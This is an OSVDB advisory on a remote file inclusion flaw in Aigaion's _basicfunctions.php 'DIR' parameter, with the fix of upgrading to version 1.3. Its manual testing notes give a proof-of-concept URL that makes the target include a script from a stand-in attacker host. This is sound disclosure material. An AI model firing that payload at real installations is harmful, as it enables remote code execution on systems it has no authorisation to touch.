Aigaion _basicfunctions.php DIR Variable Remote File Inclusion

2006-11-14T09:19:10
ID OSVDB:30377
Type osvdb
Reporter navairum()
Modified 2006-11-14T09:19:10

Description

Vulnerability Description

Aigaion contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to _basicfunctions.php not properly sanitizing user input supplied to the 'DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Upgrade to version 1.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

Short Description

Aigaion contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to _basicfunctions.php not properly sanitizing user input supplied to the 'DIR' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/[path]/_basicfunctions.php?DIR=http://[attacker]/uhoh.txt?

References:

Vendor URL: http://www.aigaion.nl/index.php?page=home Vendor URL: http://sourceforge.net/projects/aigaion/ Vendor Specific News/Changelog Entry: http://sourceforge.net/forum/forum.php?forum_id=655242 Secunia Advisory ID:22862 Related OSVDB ID: 30378 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-11/0188.html Generic Exploit URL: http://milw0rm.com/exploits/2777 FrSIRT Advisory: ADV-2006-4497 CVE-2006-5930 Bugtraq ID: 21038